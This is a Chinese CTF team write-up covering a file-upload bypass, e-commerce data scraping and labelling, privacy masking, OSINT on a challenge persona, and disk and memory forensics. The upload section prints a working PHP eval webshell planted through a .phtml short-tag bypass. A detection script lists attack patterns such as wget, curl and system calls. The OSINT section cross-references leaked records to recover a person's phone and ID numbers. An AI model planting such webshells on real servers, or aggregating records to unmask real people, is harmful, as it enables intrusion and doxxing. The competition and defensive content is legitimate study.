数据安全#

ez_upload | @Rusty#

明显考察的是文件上传漏洞，按顺序一个个试，先上传了个txt和png、jpg，都不行，然后试试php，也不行，看来对文件后缀的过滤很严格。最后测试phtml可以实现绕过

直接上传<?php发现会被拦截，经测试用短标签<?=可以绕过

参考链接：https://blog.csdn.net/m0_53008479/article/details/123366077

挂马 te.phtml

1
<?=eval($_POST['ant'])?>

蚂剑连接找到rsa文件夹

/var/www/rssss4a

模型安全#

数据预处理#

网页数据需要从原始 HTML 结构，每个商品的链接为

http://47.117.186.154:32903/index.php?controller=product&action=detail&id=<:id>

id 为 1-500 的纯数字，因为有情感色彩分析，考虑用本地 ollama

先写一个数据抓取脚本，来抓取数据

1
from bs4 import BeautifulSoup
2
import csv
3
import httpx
4
from tqdm import tqdm
5

6
data_list = []
7

8
for i in tqdm(range(1, 501)):
9
    html_content = httpx.get(f"http://47.117.186.154:32903/index.php?controller=product&action=detail&id={i}").text
10
    soup = BeautifulSoup(html_content, 'html.parser')
11

12
    # 获取商品信息
13
    product_name_element = soup.find('section', class_='product-detail').find('h2')
14
    product_name = product_name_element.text.strip() if product_name_element else ''
15

16
    product_price_element = soup.find('span', id='productPrice')
17
    product_price = product_price_element.text.strip() if product_price_element else ''
18

19
    product_sales_element = soup.find('span', id='productSales')
20
    product_sales = product_sales_element.text.strip() if product_sales_element else ''
21

22
    product_description_element = soup.find('div', class_='product-description').find('p')
23
    product_description = product_description_element.text.strip() if product_description_element else ''
24

25
    # 商品ID
26
    product_id = i
27
    data_list.append({
28
        '商品ID': product_id,
29
        '商品名称': product_name,
30
        '商品销量': product_sales,
31
        '商品价格': product_price,
32
        '商品描述': product_description,
33
        '用户ID': -1,
34
        '用户名': "Luminoria",
35
        '电话': "1145141919810",
36
        'UA': "NOT_A_UA",
37
        '评论内容': "NO_COMMENT"
38
    })
39

40
    # 获取评论信息
41
    reviews = soup.find('section', class_='product-reviews').find_all('div', class_='review-item')
42

43
    for review in reviews:
44
        reviewer_info = review.find('div', class_='reviewer-info')
45
        user_id_element = reviewer_info.find('span', class_='user-id')
46
        user_id = user_id_element.text.replace('用户ID：', '').strip() if user_id_element else ''
47

48
        username_element = reviewer_info.find('span', class_='reviewer-name')
49
        username = username_element.text.replace('用户名：', '').strip() if username_element else ''
50

51
        phone_element = reviewer_info.find('span', class_='reviewer-phone')
52
        phone = phone_element.text.replace('联系电话：', '').strip() if phone_element else ''
53

54
        ua_element = reviewer_info.find('span', class_='user-agent')
55
        ua = ua_element.text.replace('使用设备：', '').strip() if ua_element else ''
56

57
        review_content_element = review.find('div', class_='review-content')
58
        review_content = review_content_element.text.strip() if review_content_element else ''
59

60
        data_list.append({
61
            '商品ID': product_id,
62
            '商品名称': product_name,
63
            '商品销量': product_sales,
64
            '商品价格': product_price,
65
            '商品描述': product_description,
66
            '用户ID': user_id,
67
            '用户名': username,
68
            '电话': phone,
69
            'UA': ua,
70
            '评论内容': review_content
71
        })
72

73
# 写入 CSV 文件
74
csv_file_path = 'data.csv'
75
csv_columns = ['商品ID', '商品名称', '商品销量', '商品价格', '商品描述', '用户ID', '用户名', '电话', 'UA', '评论内容']
76

77
with open(csv_file_path, 'w', newline='', encoding='utf-8') as csvfile:
78
    writer = csv.DictWriter(csvfile, fieldnames=csv_columns)
79
    writer.writeheader()
80
    writer.writerows(data_list)
81

82
print(f"数据已保存到 {csv_file_path}")

得到一个含有所有内容的 csv 文件，然后拿着这个 CSV 做题

数据标注与完整性校验 | @Luminoria#

任务一（数据标注与完整性校验）：针对在线团购平台提供的原始用户评论数据，爬取用户评论数据，进行情感标注（正面/负面），并基于用户ID、用户名、手机号生成MD5签名以校验完整性。按附件模板和任务书要求提交处理后的submit_1.csv文件进行评分。

用 qwen 进行情感判断

1
import csv
2
import ollama
3
import hashlib
4
from tqdm import tqdm
5

6
def get_sentiment_from_ollama(text):
7
    """
8
    使用本地 Ollama 模型识别文本的情感色彩 (正面/负面)。
9

10
    Args:
11
        text (str): 要分析的文本。
12

13
    Returns:
14
        int: 1 代表正面情感，0 代表负面情感，None 代表无法确定或出错。
15
    """
16
    prompt = f"请分析以下评论的情感色彩，判断是正面还是负面。如果评论是正面的，请回答 '正面'，如果是负面的，请回答 '负面'。只返回 '正面' 或 '负面' 两个词，如果你认为是中性的，你应该回答 '正面'\n评论内容：\n{text}\n情感色彩:"
17
    try:
18
        response = ollama.chat(model='qwen2.5:7B', messages=[
19
            {
20
                'role': 'user',
21
                'content': prompt,
22
            },
23

24
        ])
25
        sentiment_label = response['message']['content'].strip()
26
        if "正面" in sentiment_label:
27
            return 1
28
        elif "负面" in sentiment_label:
29
            return 0
30
        else:
31
            print(f"Ollama 无法识别情感: {sentiment_label}, 评论文本: {text}")
32
            return None
33
    except Exception as e:
34
        print(f"Ollama 调用出错: {e}, 评论文本: {text}")
35
        return None
36

37
def calculate_signature(user_id, username, phone):
38
    """
39
    计算用户签名，使用 MD5 运算。
40

41
    Args:
42
        user_id (str): 用户ID.
43
        username (str): 用户名.
44
        phone (str): 用户手机号.
45

46
    Returns:
47
        str: MD5 签名字符串.
48
    """
49
    signature_string = str(user_id) + username + phone
50
    md5_hash = hashlib.md5(signature_string.encode('utf-8')).hexdigest()
51
    return md5_hash
52

53
def process_comments_and_sentiment(input_csv_file, output_csv_file):
54
    """
55
    从 data.csv 中读取评论数据，进行情感分析，并保存结果到 q1.csv。
56

57
    Args:
58
        input_csv_file (str): 输入 CSV 文件路径 (data.csv).
59
        output_csv_file (str): 输出 CSV 文件路径 (q1.csv).
60
    """
61
    output_data = []
62

63
    with open(input_csv_file, 'r', encoding='utf-8') as infile:
64
        reader = csv.DictReader(infile)
65
        for row in tqdm(reader):
66
            user_id = row['用户ID']
67
            username = row['用户名']
68
            phone = row['电话']
69
            review_content = row['评论内容']
70

71
            if username == "Luminoria": # 提取数据时产生的占位行，要忽略
72
                continue
73

74
            sentiment_label = get_sentiment_from_ollama(review_content)
75

76
            if sentiment_label is not None:
77
                signature = calculate_signature(user_id, username, phone)
78
                output_data.append({
79
                    'user_id': user_id,
80
                    'label': sentiment_label,
81
                    'signature': signature
82
                })
83

84
    csv_columns = ['user_id', 'label', 'signature']
85
    with open(output_csv_file, 'w', newline='', encoding='utf-8') as outfile:
86
        writer = csv.DictWriter(outfile, fieldnames=csv_columns)
87
        writer.writeheader()
88
        writer.writerows(output_data)
89

90
    print(f"评论情感分析完成，结果已保存到 {output_csv_file}")
91

92
if __name__ == "__main__":
93
    input_csv_file = 'data.csv'
94
    output_csv_file = 'q1.csv'
95
    process_comments_and_sentiment(input_csv_file, output_csv_file)

得到 q1.csv 改名 submit_1.csv 交了就行

数据清洗及特征工程 | @Luminoria#

一样是使用 qwen2.5-7B 进行分类判断，其他正常清洗即可

1
import csv
2
import ollama
3
from tqdm import tqdm
4

5
def get_category_id_from_ollama(product_name, category_list_str):
6
    """
7
    使用本地 Ollama 模型根据商品名称获取最合适的分类 ID。
8

9
    Args:
10
        product_name (str): 商品名称.
11
        category_list_str (str): 分类列表字符串.
12

13
    Returns:
14
        str: 最合适的分类 ID，如果无法确定则返回 None.
15
    """
16
    prompt = f"请根据商品名称 '{product_name}'，从以下分类列表中选择最合适的分类ID。只返回ID数字，不要返回其他文字。\n分类列表:\n{category_list_str}\n分类ID:"
17
    try:
18
        response = ollama.chat(model='qwen2.5:7b', messages=[
19
            {
20
                'role': 'user',
21
                'content': prompt,
22
            },
23
        ])
24
        category_id = response['message']['content'].strip()
25
        if category_id.isdigit():
26
            return category_id
27
        else:
28
            print(f"Ollama 返回的分类ID不是数字: {category_id}, 商品名称: {product_name}")
29
            return None
30
    except Exception as e:
31
        print(f"Ollama 调用出错: {e}, 商品名称: {product_name}")
32
        return None
33

34
def clean_data_and_categorize(input_csv_file, output_csv_file):
35
    """
36
    读取 data.csv 文件，进行数据清洗、商品分类和聚合，并将结果保存到 q2.csv 文件。
37

38
    Args:
39
        input_csv_file (str): 输入 CSV 文件路径 (data.csv).
40
        output_csv_file (str): 输出 CSV 文件路径 (q2.csv).
41
    """
42

43
    category_list = {
44
        1: "手机", 2: "母婴用品", 3: "家具", 4: "书籍", 5: "蔬菜", 6: "厨房用具", 7: "办公", 8: "睡衣", 9: "宠物",
45
        10: "运动", 11: "热水器", 12: "彩妆", 13: "保健品", 14: "酒水", 15: "玩具乐器", 16: "汽车", 17: "床上用品",
46
        18: "洗护用品", 19: "五金", 20: "户外", 21: "珠宝", 22: "医疗器械", 23: "花卉园艺", 24: "游戏", 25: "园艺"
47
    }
48
    category_list_str = "\n".join([f"{k}. {v}" for k, v in category_list.items()])
49

50
    product_data = {} # 用于存储商品信息和评论计数，key 是 商品ID
51
    product_names = {} # 用于存储商品名称，key 是 商品ID，用于去重分类
52

53
    with open(input_csv_file, 'r', encoding='utf-8') as infile:
54
        reader = csv.DictReader(infile)
55
        for row in reader:
56
            product_id = row['商品ID']
57
            product_name = row['商品名称']
58
            product_sales_str = row['商品销量']
59

60
            # 清洗销量数据
61
            try:
62
                product_sales = int(float(product_sales_str.replace(',', '')))
63
                if product_sales < 0 or product_sales_str == '': # 空字符串也当做0
64
                    product_sales = 0
65
            except ValueError:
66
                product_sales = 0
67

68
            if product_id not in product_data:
69
                product_data[product_id] = {
70
                    '销量': product_sales,
71
                    '评论总数': 0,
72
                    '分类ID': None, # 初始分类ID为None
73
                }
74
                product_names[product_id] = product_name # 记录商品名称用于分类
75
            if row["用户名"] == "Luminoria": # 提取数据时产生的占位行，要忽略
76
                continue
77
            product_data[product_id]['评论总数'] += 1 # 每次读取到同一商品ID的评论，评论总数加1
78

79
    # 调用 Ollama 获取分类ID
80
    for product_id, product_name in tqdm(product_names.items()):
81
        category_id = get_category_id_from_ollama(product_name, category_list_str)
82
        if category_id:
83
            product_data[product_id]['分类ID'] = category_id
84
        else:
85
            product_data[product_id]['分类ID'] = '0' # 无法分类的设置为0或其他默认值
86

87
    # 准备写入 q2.csv 的数据，并排序
88
    output_data = []
89
    for product_id in sorted(product_data.keys(), key=int): # 按照商品ID升序排序
90
        output_data.append({
91
            'ID': product_id,
92
            '销量': product_data[product_id]['销量'],
93
            '分类ID': product_data[product_id]['分类ID'] if product_data[product_id]['分类ID'] else '0', # 确保分类ID不为None
94
            '评论总数': product_data[product_id]['评论总数']
95
        })
96

97
    csv_columns = ['product_id', 'sales', 'category_id', 'reviews_number']
98
    with open(output_csv_file, 'w', newline='', encoding='utf-8') as outfile:
99
        writer = csv.DictWriter(outfile, fieldnames=csv_columns)
100
        writer.writeheader()
101
        writer.writerows(output_data)
102

103
    print(f"数据清洗、分类和聚合完成，结果已保存到 {output_csv_file}")
104

105
if __name__ == "__main__":
106
    input_csv_file = 'data.csv'
107
    output_csv_file = 'submit_2.csv'
108
    clean_data_and_categorize(input_csv_file, output_csv_file)

然后将保存的 submit_2.csv 提交就行

隐私保护与恶意检测 | @Luminoria#

因为不存在需要 AI 判断的东西，所以直接用 re 抓关键词就行

1
import csv
2
import re
3
from tqdm import tqdm
4
import ollama
5

6
# 手机号脱敏函数
7
def desensitize_phone(phone):
8
    digits = re.sub(r'\D', '', str(phone))  # 去除非数字字符
9
    if len(digits) < 7:
10
        return ''
11
    return digits[:3] + "****" + digits[-4:]
12

13
# 恶意代码检测函数
14
def is_malicious(ua):
15
    if not ua or ua.strip() == "NOT_A_UA":
16
        return False
17
    # 定义恶意代码正则表达式规则
18
    patterns = [
19
        # SQL注入检测
20
        r';\s*(select|insert|update|delete|drop)\b',
21
        r'\bunion\s+select\b',
22
        r'\bselect\b.*\bfrom\b',
23
        # XSS检测
24
        r'<\s*script\b.*?>.*?<\s*/\s*script\s*>',
25
        r'onerror\s*=',
26
        r'onload\s*=',
27
        # 命令执行检测
28
        r'(\|\||&&|\$\(|\b(wget|curl|rm|ls|cat|echo)\b)',
29
        # 代码执行检测
30
        r'\b(eval|exec|system|passthru|shell_exec)\s*\(',
31
    ]
32
    for pattern in patterns:
33
        if re.search(pattern, ua, re.IGNORECASE):
34
            return True
35
    return False
36

37
# 统计有效行数
38
valid_rows = 0
39
with open('data.csv', 'r', encoding='utf-8') as f:
40
    reader = csv.DictReader(f)
41
    for row in reader:
42
        if row['用户名'] != 'Luminoria':
43
            valid_rows += 1
44

45
# 处理数据并收集结果
46
processed = []
47
with open('data.csv', 'r', encoding='utf-8') as f_in:
48
    reader = csv.DictReader(f_in)
49
    with tqdm(total=valid_rows, desc="Processing", unit="row") as pbar:
50
        for row in reader:
51
            if row['用户名'] == 'Luminoria': # 提取数据时产生的占位行，要忽略
52
                continue
53

54
            # 手机号脱敏
55
            desen_phone = desensitize_phone(row['电话'])
56

57
            # 恶意代码检测
58
            ua = row['UA']
59
            is_mal = is_malicious(ua)
60
            code_check = 'FALSE' if is_mal else 'TRUE'
61

62
            # 保存结果
63
            processed.append({
64
                'user_id': int(row['用户ID']),
65
                'desensitization': desen_phone,
66
                'code_check': code_check
67
            })
68
            pbar.update(1)
69

70
# 按user_id升序排序
71
processed.sort(key=lambda x: x['user_id'])
72

73
# 写入结果文件
74
with open('submit_3.csv', 'w', newline='', encoding='utf-8') as f_out:
75
    writer = csv.DictWriter(f_out, fieldnames=['user_id', 'desensitization', 'code_check'])
76
    writer.writeheader()
77
    writer.writerows(processed)
78

79
print("处理完成，结果已保存至 submit_3.csv")

然后直接交出来的文件就行

社会工程#

张华强的公司名称 | @Luminoria @Ron#

个人做法#

在队友给了公司名的情况下，用脚本去搜题目提供的工商信息里面的内容

1
import os
2
import openpyxl
3

4
def search_keyword_in_excel(folder_path, keyword):
5
    """
6
    遍历指定文件夹下的所有xlsx文件，查找包含关键词的行并打印。
7

8
    Args:
9
        folder_path: 包含xlsx文件的文件夹路径。
10
        keyword: 要搜索的关键词。
11
    """
12
    found_files = False  # 标记是否找到包含关键词的文件
13

14
    for filename in os.listdir(folder_path):
15
        if filename.endswith(".xlsx"):
16
            file_path = os.path.join(folder_path, filename)
17
            print(f"正在处理文件: {filename}")
18
            found_in_file = False  # 标记当前文件是否找到关键词
19

20
            try:
21
                workbook = openpyxl.load_workbook(file_path)
22
                for sheet_name in workbook.sheetnames:
23
                    sheet = workbook[sheet_name]
24
                    for row_index, row in enumerate(sheet.rows, start=1): # 从第一行开始，row_index从1开始
25
                        row_values = [str(cell.value) for cell in row] # 将单元格值转换为字符串，处理None值
26
                        if any(keyword in value for value in row_values if value is not None): # 检查关键词是否存在于行的任何单元格中 (忽略None值)
27
                            found_in_file = True
28
                            found_files = True
29
                            print(f"  - 表单: {sheet_name}, 行号: {row_index}, 内容: {row_values}")
30

31
                if not found_in_file:
32
                    print(f"  - 未在文件中找到关键词 '{keyword}'。")
33
                else:
34
                    print(f"  - 在文件中找到关键词 '{keyword}'。")
35

36
            except Exception as e:
37
                print(f"  - 处理文件 {filename} 时出错: {e}")
38

39
    if not found_files:
40
        print(f"在文件夹 '{folder_path}' 中没有任何文件包含关键词 '{keyword}'。")
41

42

43
if __name__ == "__main__":
44
    folder_to_search = "gongshang"
45
    keyword_to_find = "博林科技"
46

47
    if not os.path.exists(folder_to_search):
48
        print(f"错误: 文件夹 '{folder_to_search}' 不存在。请确保文件夹路径正确。")
49
    else:
50
        print(f"开始在文件夹 '{folder_to_search}' 中搜索关键词 '{keyword_to_find}'...")
51
        search_keyword_in_excel(folder_to_search, keyword_to_find)
52
        print("搜索完成。")

在 data47.xlsx 中能找到相关的信息

1
正在处理文件: data47.xlsx
2
  - 表单: Sheet1, 行号: 5216, 内容: ['99640928131194569978', '杭州市', '闵行区星辰信息技术园', '江苏博林科技有限公司']
3
  - 在文件中找到关键词 '博林科技'。

队友做法#

1
import sqlite3
2
import os
3
import datetime
4
import csv
5
from collections import defaultdict
6

7
def get_db_path(date):
8
    return f"./附件/rides/{date}.db"
9

10
def query_data(start_date, end_date):
11
    current_date = start_date
12
    user_rides = defaultdict(int)
13

14
    while current_date <= end_date:
15
        print(current_date)
16
        db_path = get_db_path(current_date.strftime('%Y-%m-%d'))
17
        if os.path.exists(db_path):
18
            conn = sqlite3.connect(db_path)
19
            cursor = conn.cursor()
20

21
            cursor.execute("""
22
                SELECT name, phone
23
                FROM location_data
24
                WHERE strftime('%w', date) BETWEEN '1' AND '5'
25
                AND name LIKE '张%'
26
            """)
27

28
            for name, phone in cursor.fetchall():
29
                user_rides[(name, phone)] += 1
30

31
            conn.close()
32

33
        current_date += datetime.timedelta(days=1)
34

35
    sorted_rides = sorted(user_rides.items(), key=lambda x: x[1], reverse=True)
36
    return sorted_rides
37

38
if __name__ == "__main__":
39
    start_date = datetime.date(2024, 12, 1)
40
    end_date = datetime.date(2024, 12, 31)
41
    results = query_data(start_date, end_date)
42

43
    with open("result.csv", "w", newline="", encoding="utf-8") as file:
44
        writer = csv.writer(file)
45
        writer.writerow(["Name", "Phone", "Rides"])
46
        for (name, phone), count in results:
47
            writer.writerow([name, phone, count])
48

49
    for (name, phone), count in results:
50
        print(f"{name} ({phone}): {count} rides")

先用Python 拿到每个用户（用户名和手机号一致为一个）在周一到周五打车的数据条目数

发现138****9377遥遥领先

在db中翻找发现周一到周五都有打车，周末没有，基本符合 张某的生活习惯为：周一到周五从家打车去公司，周末无明显固定作息

在快递中搜索手机号找到数据

1
MF7297484562175167 2025-01-21 宋** 134****9281 **市**区******中心32楼兰金电子 张** 138****9377 **市**区******息技术园16楼博林科技
2
MF3442357592017816 2025-02-01 金** 188****9754 **市**区******来智汇园6楼易动力信 张** 138****9377 **市**区******息技术园16楼博林科技

结合爬取的工商信息，提交张某所属公司的全称

答案为：江苏博林科技有限公司

张华强的手机号 | @Luminoria @Ron#

个人做法#

还是跑脚本

1
import os
2
import re
3
from bs4 import BeautifulSoup
4
from tqdm import tqdm
5

6
def extract_info_from_html(html_content):
7
    """
8
    从 HTML 内容中提取手机号和身份证号。
9

10
    Args:
11
        html_content: HTML 文件的字符串内容。
12

13
    Returns:
14
        一个字典，包含 'phone_number' 和 'id_number'，如果没有找到则为 None。
15
    """
16
    soup = BeautifulSoup(html_content, 'html.parser')
17

18
    # 查找是否包含 "张华强"
19
    if "张华强" not in soup.body.get_text():
20
        return None
21

22
    # 查找隐藏信息
23
    hidden_info_div = soup.find('div', class_='hidden-info')
24
    if hidden_info_div:
25
        info_text = hidden_info_div.text
26
        parts = info_text.split('|')
27

28
        if len(parts) == 2:
29
            phone_number = parts[0]
30
            id_number = parts[1]
31

32
            # 验证手机号格式是否为 138****9377
33
            phone_pattern = re.compile(r'^138\d{4}9377$')
34
            if phone_pattern.match(phone_number):
35
                return {'phone_number': phone_number, 'id_number': id_number}
36
    return None
37

38
def traverse_webpages(folder_path):
39
    """
40
    遍历指定文件夹下的所有 HTML 文件，并提取信息。
41

42
    Args:
43
        folder_path: 网页文件夹的路径。
44
    """
45
    for root, dirs, files in os.walk(folder_path):
46
        for file in tqdm(files):
47
            if file.endswith(".html"):
48
                file_path = os.path.join(root, file)
49
                try:
50
                    with open(file_path, 'r', encoding='utf-8') as f:
51
                        html_content = f.read()
52
                        extracted_data = extract_info_from_html(html_content)
53
                        if extracted_data:
54
                            print(f"在文件: {file_path} 中找到匹配信息:")
55
                            print(f"  手机号: {extracted_data['phone_number']}")
56
                            print(f"  身份证号: {extracted_data['id_number']}")
57
                            print("-" * 30)
58
                except Exception as e:
59
                    print(f"处理文件 {file_path} 出错: {e}")
60

61
if __name__ == "__main__":
62
    webpage_folder = "webpage"
63
    traverse_webpages(webpage_folder)

1
在文件: webpage\40\5840.html 中找到匹配信息:
2
  手机号: 13891889377
3
    身份证号: 61050119980416547X

队友做法#

使用 cat ./{文件夹ID}/*.html | grep -E "138[0-9]{4}9377|张华强" 逐个找信息，遍历文件夹ID，发现在40号文件夹出现结果

1
cat ./40/*.html | grep -E "138[0-9]{4}9377|张华强"

答案为：13891889377

张华强的身份证号 | @Luminoria @Ron#

使用 cat ./{文件夹ID}/*.html | grep -E "138[0-9]{4}9377|张华强" 逐个找信息，遍历文件夹ID，发现在40号文件夹出现结果

1
cat ./40/*.html | grep -E "138[0-9]{4}9377|张华强"

跟着第三题，一起出

61050119980416547X

张华强的车牌号 | @Luminoria @Ron#

用OCR识别图片中的手机号

1
import os
2
import pytesseract
3
from PIL import Image
4
import re
5

6
def find_number_in_image(image_path, target_number):
7
    try:
8
        img = Image.open(image_path)
9
        text = pytesseract.image_to_string(img, lang='eng')
10

11
        pattern = r"\b" + re.escape(target_number) + r"\b"
12
        match = re.search(pattern, text)
13

14
        if match:
15
            return text
16
        else:
17
            return None
18
    except Exception as e:
19
        print(f"处理图片 {image_path} 时出错: {e}")
20
        return None
21

22
def main():
23
    parking_folder = "./附件/parking"
24
    target_number = "13891889377"
25

26
    if not os.path.exists(parking_folder):
27
        print(f"文件夹 '{parking_folder}' 不存在，请检查路径。")
28
        return
29

30
    found_in_images = []
31

32
    c = 0
33

34
    for filename in os.listdir(parking_folder):
35
        c += 1
36
        if filename.lower().endswith(('.jpg')):
37
            image_path = os.path.join(parking_folder, filename)
38
            result = find_number_in_image(image_path, target_number)
39
            if result:
40
                print(f"{filename}r : {result}")
41

42
                found_in_images.append(filename)
43
        print(f"{c} {filename}", end='\r')
44

45
    if not found_in_images:
46
        print(f"Noting Found")
47

48
if __name__ == "__main__":
49
    main()

在1357.jpg里面找到了手机号

数据分析#

溯源与取证#

硬盘取证 Word 恢复 | @Ron#

DG打开img扫描删除的文件

用DG恢复文档

染色后找到flag

内存取证及日志分析 | @Ron#

DiskGenius打开查看分区起始位置

使用Linux mount img文件

1
sudo mount -o loop,offset=32256 ./disk1.img /mnt #offset=512*63=32256

将7z文件复制出来解压得到内存镜像

使用voltality3扫描文件

1
vol -f ./WIN-IRBP5Q8F25I-20250306-172341.raw  windows.filescan.FileScan > filelist.txt

发现log文件，dump下来

1
vol -f ./WIN-IRBP5Q8F25I-20250306-172341.raw windows.dumpfiles.DumpFiles --physaddr 0x7c23ba40

直接打开很明显的sql注入

故114.10.143.92即为攻击者IP